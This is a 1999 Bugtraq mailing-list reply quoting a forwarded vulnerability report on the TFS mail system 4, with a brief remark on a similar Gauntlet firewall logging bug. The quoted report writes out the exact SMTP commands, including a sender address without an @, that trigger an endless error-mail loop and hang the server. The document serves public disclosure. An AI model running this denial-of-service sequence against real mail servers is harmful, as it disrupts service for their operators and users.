Re: I found this today and iam reporting it to you first!!! (fwd)

[coolwhipie () EROLS COM (blue0ne)]

There was a similar problem with SMAP on Gauntlet Firewalls a couple of
years back.  Only in that instance, it would eventually fill up the
filesystem with logs, and the proxy service would fail.

blue0ne

-----Original Message-----
From: Alfred Huger <ah () SECURITYFOCUS COM>
To: BUGTRAQ () SECURITYFOCUS COM <BUGTRAQ () SECURITYFOCUS COM>
Date: Thursday, September 02, 1999 3:35 AM
Subject: I found this today and iam reporting it to you first!!! (fwd)

> ---------- Forwarded message ----------
> Date: Mon, 30 Aug 1999 21:08:14 +0200
> From: Hakan Franzen <fableman () hem passagen se>
> To: vuldb () securityfocus com
> Subject: I found this today and iam reporting it to you first!!!
>
> Target: TFS mail system 4 (i think its working on earlier version aswell)
(TFS just got some award about there security about emails)
> Company makes the product:   www.tenfour.se
> OS: win95 98 nt
> Reported by: FableMan Noxidus a member of #HACK on IRCNet
> a DoS routine:  Makes a FAST loop generating loooots of emails until its
forced to stop by admin.
> what i did is:  TELNET TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX 25
> typing HELO
> typing MAIL FROM:FABLEMAN NOXIDUS
> RCPT TO:FIXYOUR >RCPT TO:FIXYOUR SYSTEM. () TARGETSYSTEMRUNNING TFS MAIL GATE XXX
> DATA
> Fix you system
> Error found by FableMan Noxidus a #HACK member of IRCNet
> .
> QUIT
>
>
> Thats all  now the system tries to send to FIXYOUR
SYSTEM. () TARGETSYSTEMRUNNING TFS MAIL GATE XXX
> but that address is wrong soo then it generates a reporterror and mails to
FABLEMAN NOXIDUS but cos i havent included a @ then i will not go out on
internet
> then the loops starts.. its generating a reporterror and the loop is a
truh..
> I found it when i was playing around with a TFS mail gate system..
>
> The speed of error report generation is about 1 or more email /sec soo if
you start the loop and after 1 hr its a loot of email generated...
> until windows or NT hangs cos of it